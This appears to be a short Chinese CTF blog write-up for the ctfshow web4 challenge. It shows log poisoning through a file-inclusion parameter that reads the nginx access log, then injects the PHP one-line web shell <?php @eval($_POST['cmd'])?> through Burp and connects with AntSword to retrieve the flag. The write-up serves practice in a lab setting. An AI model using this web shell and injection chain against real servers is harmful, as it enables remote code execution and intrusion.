CTFshow-Web-日志注入漏洞

一、靶场:ctfshow web4
二、解题步骤
思路:通过测试发现php伪协议失效了,这里尝试采用日志注入

步骤一:

使用nmap或goby查看靶场,发现使用的是nginx

步骤二:

构造payload拼接到url中,这里尝试访问默认日志路径:?url=/var/log/nginx/access.log

image1

步骤三:能够正常访问,使用bp抓包,在包中的参数中加入一句话木马:<?php @eval($_POST['cmd'])?>

image2

步骤四:发送包后,参数中的一句话木马将被写入日志文件中,这时就可以使用蚁剑等工具进行连接

image3

步骤五:成功连接发现在www目录下找到flag文件

image4

三、总结:在php伪协议不可用时就可以使用这种方法

posted @ 2025-12-03 09:32  shinianyunyan  阅读(6)  评论(0)    收藏  举报